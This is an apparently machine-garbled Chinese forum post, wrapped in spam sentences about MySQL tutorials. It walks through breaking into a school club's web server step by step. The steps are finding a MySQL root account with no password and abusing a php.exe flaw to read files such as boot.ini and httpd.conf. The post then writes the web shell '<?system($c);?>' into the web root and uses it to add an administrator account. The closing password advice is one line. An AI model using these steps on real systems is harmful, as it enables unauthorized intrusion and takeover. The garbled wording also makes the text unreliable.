|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
DBaaS会导致单一客户利润率的下降,因为云服务一般是依靠MySQL学习教程数来抵消较低的利润率。mysql用superscan扫了一下
某个c类的网段,寻觅开放80端口的呆板,了局就只要一台呆板
开放了80端口,试着连了一下,是我们黉舍某个社团的的主页。
从端口的banner来看应当是apache(win32),证明一下
telnet211.87.xxx.xxx
get(回车)
<!DOCTYPEHTMLPUBLIC"-//IETF//DTDHTML2.0//EN">
<HTML><HEAD>
<TITLE>501Method
NotImplemented</TITLE>
</HEAD><BODY>
<H1>MethodNotImplemented</H1>
getto/index
.htmlnotsupported.<P>
Invalidmethodinrequestget<P>
<HR>
<ADDRESS>Apache/1.3.2
2Serveratwww.xxxxxx.comPort80</ADDRESS>
</BODY></HTML>
丢失对主机的毗连。
C:>
呵呵,这下看得更分明了
据我推测,应当是"apache+mysql+php"的黄金组合吧
习气性的mysql-h211.87.xxx.xxx
公然连上了
WelcometotheMySQLmonitor.Commandsendwithorg.
YourMySQLconnectionidis17toserverversion:3.23.53-max-nt
Typehelp;orhforhelp.Typectoclearthebuffer.
mysql>
断开试着
mysql-h211.87.xxx.xxx-uroot-p
password:
WelcometotheMySQLmonitor.Commandsendwithorg.
YourMySQLconnectionidis18toserverversion:3.23.53-max-nt
Typehelp;orhforhelp.Typectoclearthebuffer.
mysql>
呵呵,人人看到了他的root用户没有暗码,这是我明天要说的第一个主题。
这是相称的伤害的,遇见这类情形,有99.999%的大概能够进进
既然利用的apache+php,只需找到他在当地寄存的web的物理路径就随心所欲了
呵呵
下一个成绩是我明天要说的重点怎样才干晓得那台主机的寄存的web的物理路径?
办法有良多种,在这里我先容2种办法供初学者参考
起首要告知人人的是低版本的apache+php有一个毛病
提http://xxx.xxxx.xxx.xxx/php/php.exe?对方的物理文件名
就能够把谁人物理文件下载上去。
因而提http://211.87.xxx.xxx/php/php.exe?c:a.txt
前往
Noinputfilespecified.(没有这个毛病的话提醒找不到网页)
好的,这申明他有这个毛病。
在提http://211.87.xxx.xxx/php/php.exe?c:oot.ini
前往
[bootloader]timeout=30default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS[operating
systems]multi(0)disk(0)rdisk(0)partition(1)WINDOWS="MicrosoftWindowsXPProfessional"
/fastdetect
呵呵,装的仍是xp。
好了,我们能够推测对方apache的conf文件的物理地位了
http://211.87.xxx.xxx/php/php.exe?c:apacheconfhttpd.conf
Noinputfilespecified.
http://211.87.xxx.xxx/php/php.exe?d:apacheconfhttpd.conf
Noinputfilespecified.
http://211.87.xxx.xxx/php/php.exe?e:apacheconfhttpd.conf
Noinputfilespecified.
http://211.87.xxx.xxx/php/php.exe?c:ProgramFilesapacheconfhttpd.conf
Noinputfilespecified.
http://211.87.xxx.xxx/php/php.exe?f:apacheconfhttpd.conf
猜到了,前往了很多多少器材
找到我们想要的
#DocumentRoot:Thedirectoryoutofwhichyouwillserveyour
#documents.Bydefault,allrequestsaretakenfromthisdirectory,but
#symboliclinksandaliasesmaybeusedtopointtootherlocations.
#
DocumentRoot"D:homepage"
看得出来对方的主目次是D:homepage
上面的事就好办了,如今就想失掉shell?
先别急,我们先来看看另外一种办法
那就是使用mysql的毛病
任意的扫瞄一下他的网页找到一处使用mysql的中央
http://211.87.xxx.xxx/skonline/study/list.php?id=14
长得太帅了,哈哈哈哈
提交
http://211.87.xxx.xxx/skonline/study/list.php?id=14
前往
Warning:SuppliedargumentisnotavalidMySQLresultresourcein
d:homepageskonlinestudylist.phponline231
呵呵,一清二楚。
然后,然后就是打造我们的shell
mysql-h211.87.xxx.xxx-uroot-p
password:
WelcometotheMySQLmonitor.Commandsendwithorg.
YourMySQLconnectionidis18toserverversion:3.23.53-max-nt
Typehelp;orhforhelp.Typectoclearthebuffer.
mysql>usetest;
Databasechanged
mysql>createtablet(cmdtext);
QueryOK,0rowsaffected(0.08sec)
mysql>insertintotvalues(<?system($c);?>);
QueryOK,1rowaffected(12.52sec)
mysql>select*fromtintod:homepage est.php;
我的shell很复杂<?system($c);?>,不到20个字符,但他已充足了
可让我实行恣意命令,由此足以看出php的壮大。
怎样用?
提交
http://211.87.xxx.xxx/test.php?c=net;userkid/add
命令乐成完成
http://211.87.xxx.xxx/test.php?c=net;localgroupadministratorskid/add
命令乐成完成
呵呵,测试乐成,经由过程!
剩下的就是你自在发扬了。
由此我们不难总结出这一类的进侵步骤:
1,找到没有暗码的3306端口
2,找到对方的web物理路径
3,打造shell
4,后续事情
<P>
呵呵,在这里提示人人,假如你想要或正在用mysql的时分
万万要给本人的root设上一个强无力的密首先我们要知道,或许有一项技术存在很多理由让我们可以选择使用MySQL学习教程,但是让我们不使用它往往只要有一个理由就足够了。 |
|